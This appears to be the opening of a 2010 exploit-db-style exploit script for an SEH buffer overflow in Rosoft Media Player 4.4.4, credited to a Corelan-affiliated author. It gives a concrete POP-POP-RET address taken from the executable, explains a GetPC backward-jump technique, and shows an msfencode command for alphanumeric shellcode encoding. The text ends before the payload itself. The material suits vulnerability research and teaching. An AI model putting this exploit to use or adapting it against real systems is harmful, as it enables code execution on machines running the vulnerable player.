# #######################################################################
# Title: Rosoft media player 4.4.4 SEH buffer overflow
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
seh="\x49\xd4\x46\x00" # PPR - 0046D449 - Taken from the exe. The null byte terminates
# the copy but because we have a big area to work with prior to
# to reaching the SEH, this exploit is still possible.
# The following shellcode makes use of the GetPC technique for copying EIP into ECX.
# ECX is then adjusted to move execution 775 bytes earlier in the buffer. We need to
# to jump back further than what a short jump will allow hence the following...
#
# Referenced: phrack #62 Article 7 Originally written by Aaron Adams
#
# msfencode -i ./768bck.bin -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 107 (iteration=1)